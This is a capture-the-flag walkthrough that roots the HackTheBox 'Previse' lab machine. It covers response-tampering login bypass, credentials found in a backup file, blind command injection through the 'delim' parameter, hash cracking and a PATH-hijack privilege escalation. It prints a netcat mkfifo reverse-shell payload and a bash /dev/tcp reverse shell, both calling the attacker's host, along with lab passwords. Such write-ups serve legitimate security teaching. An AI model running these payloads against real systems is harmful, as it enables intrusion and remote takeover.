Previse HackTheBox WalkThrough
This is Previse HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Previse HackTheBox
machine. Before starting let us know something about this box. It is a Linux OS
box with IP address 10.10.11.104
and difficulty level Easy
assigned by its maker.
First of all, connect your PC with HackTheBox VPN
and confirm your connectivity with Previse
machine by pinging its IP 10.10.11.104. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning
gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap
[a popular Port Scanner] for this task and the result is given below: –
Scanning
$ sudo nmap -sC -sV -sT -p- -oN full-tcp-port.nmap 10.10.11.104
Full port scan with nmap
revealed many ports as open. We will focus mainly on ports 22
and 80
as the services running over them are well known. OpenSSH 7.6p1
is running over port 22
and Apache2
web server is running on port 80
. Since port 80 is open and web server is running over it so there must be a website hosted over it which can be accessed using the URL http://10.10.11.104. We will begin our enumeration from port 80. Ongoing to the URL http://10.10.11.104 found a login page
as shown below.
Simply, tried some default credentials
like admin
: admin
, admin
: password
, previse
: password
and some more but none of them worked. Then, tried some login screen bypass SQL payloads it also not worked. Tried fuzzing
with some malicious payloads for getting verbose error message but again everything seemed to be configured properly. If I would get some username from anywhere, I would definitely perform bruteforce attack on this login page since it doesn’t have any captcha
or rate limit
implemented on it. Meanwhile I started my $ dirsearch
in background to find folder and file.
$ sudo dirsearch -u http://10.10.11.104/ -e all -x 402,401,403,404 -t 50
Dirsearch
found many files and on accessing maximum pages, redirected
me to login page
. When I tried to access accounts.php
page through the URL http://10.10.11.104/accounts.php it redirected me to login.php
.
Forced Login into Previse
Then I go to the URL http://10.10.11.104/accounts.php and captured the request in Burpsuite and tried force login
by changing the response of the login request
. The captured request of accounts.php file is shown in the screenshot below.
Right click on the request and capture the response to this request. Then replace 302 Found
to 200 OK
to force the application not to redirect on login.php
page as shown in the screenshot given below.
After forwarding
the request it is observed that we are successfully logged in
the application.
Once I logged in the application, I tried to add a new account
by registering a new user. I have entered the credential test2
: test2
and after clicking on CREATE USER
button again captured the request in Burpsuite
and modified the response as we did in above steps.
Now we have successfully registered a user account with the credential test2
: test2
.
Let us login into the test2
user account. After login, I saw a file upload
functionality then I uploaded a simple txt
file and tried to check it whether we can execute it or not. When I accessed it, it immediately started downloading. If any how I would execute it then my next step would be to upload a php web shell
and get reverse shell on my netcat
listener. But here it is of no use.
There is a backup file present by the name SITEBACKUP.ZIP
. After downloading and extracting this file I found credentials root
: mySQL_p@ssw0rd!:)
in config.php
file. Then I tried to SSH into root user but it is not SSH credential. Tried to use this password with other enumerated users like newguy
, m4lwhere
, admin
, etc. but all are useless.
$ cat config.php
After reviewing the source code
of all the files inside SITEBACKUP.ZIP
found file logs.php
which has a php dangerous function exec()
. This function is accepting user input through the parameter delim
without performing any input validation. Use of exec() function without proper validation may leads to OS Command Injection vulnerability. For more info about exec() check this documentation.
After some testing found Blind OS Command Injection
vulnerability inside this file. Since the backup file is downloaded from this website there may be chances that running code on the server may also be vulnerable to OS command injection.
Confirming OS Command Injection
To confirm Blind OS command injection vulnerability, we will inject some time-based OS Command
like $ ping
command in Previse log.php page and then capture the response of ping using wireshark
or $ tcpdump
on our Kali machine.
$ sudo tcpdump -i tun0 icmp
We found that we can ping our kali machine through Previse machine. So here we have successfully confirmed Blind OS Command Injection vulnerability using time delays techniques. For more methods for exploiting OS command injection check this article from PortSwigger. Let us get user shell by using some reverse shell one-liner
. I am using $ nc
command for getting reverse shell. You can use any other also. You can find a list of one-liners here.
Getting User Shell
To get reverse shell start netcat
listener on your Kali machine on port 9001
and put the following onliner payload in the delim
parameter.
;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.16.10+9001+>/tmp/f
$ nc -nvlp 9001
$ whoami && id
We have successfully got reverse shell with user www-data
. Let us upgrade it to fully interactive Linux Shell so that we can run more advanced Linux command through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # To background
$ stty raw -echo
$ fg # To put foreground
$ export TERM=xterm
Checking Listening Ports
After some enumeration found that port 3306
is listening locally. Port 3306
is the default port for the classic MySQL
protocol (port), which is used by the MySQL client
, MySQL Connectors
, and utilities such as mysqldump
and mysqlpump
.
$ ss -lnpt
Since we have already found database credential inside config.php
file. So, I tried them to login into MySQL server using $ mysql
command.
$ mysql -u 'root' -p
~mySQL_p@ssw0rd!:)
mysql> show databases;
mysql> use previse;
mysql> show tables;
mysql> SELECT * FROM accounts;
mysql> exit
From above we found password hash of user m4lwhere
.
m4lwhere
: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Identify the Hash
Before we proceed to crack this hash we need to identify the type of this hash. Let us identify the type of hash and further will crack the hash to get password. The hash appears to be of the form md5crypt,
MD5 (Unix), Cisco-IOS $1$ (MD5)
can be confirmed from the below example.
$ hashcat --example-hashes | grep -A2 -i 'MODE: 500'
For cracking the hash, I have used $ hashcat
(well-known offline password cracker) with the wordlist rockyou.txt
(Rockyou.txt is already present in Kali & Parrot OS inside the directory /usr/share/wordlists/
).
Cracking Hash
$ cat hash.txt
$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 3 hash.txt /usr/share/wordlists/rockyou.txt –show
—–SNIP—–
The cracked password for the user m4lwhere is ilovecody112235!
.
Let us SSH into m4lwhere
account
$ ssh [email protected]
~ilovecody112235!
We are successfully logged in as m4lwhere. Let us capture user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a Privilege Escalation Vector
using which we can perform privilege escalation. We can find PrivEsc
vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I will go with manual enumeration.
Finding PrivEsc Vector
$ sudo -l
command revealed that user m4lwhere can run script access_backup.sh
with root privilege.
$ sudo -l
~ilovecody112235!
On analyzing the content of access_backup.sh
file found that $ gzip
command is not used with absolute path. This introduces here a Path Hijacking Vulnerability
. For more info about privilege escalation using path variable check this article.
$ cat /opt/scripts/access_backup.sh
When I tried to escalate the privilege using PATH variable
, I could easily perform privilege escalation. So, here our potential PrivEsc vector is Privilege Escalation via Path Hijacking
.
Getting Root Shell
To get the root shell I ran the following commands.
On Previse Machine
$ echo $PATH
$ echo '#!/bin/bash' > /tmp/gzip
$ echo 'bash -i >& /dev/tcp/10.10.17.97/9001 0>&1' >> /tmp/gzip
$ cat /tmp/gzip
$ chmod +x /tmp/gzip
$ export PATH=/tmp:$PATH
$ echo $PATH
$ sudo /opt/scripts/access_backup.sh
On Kali Machine
$ nc -nvlp 9001
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted Previse HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this article. For any query and suggestion about the walkthrough feel free to write us at [email protected].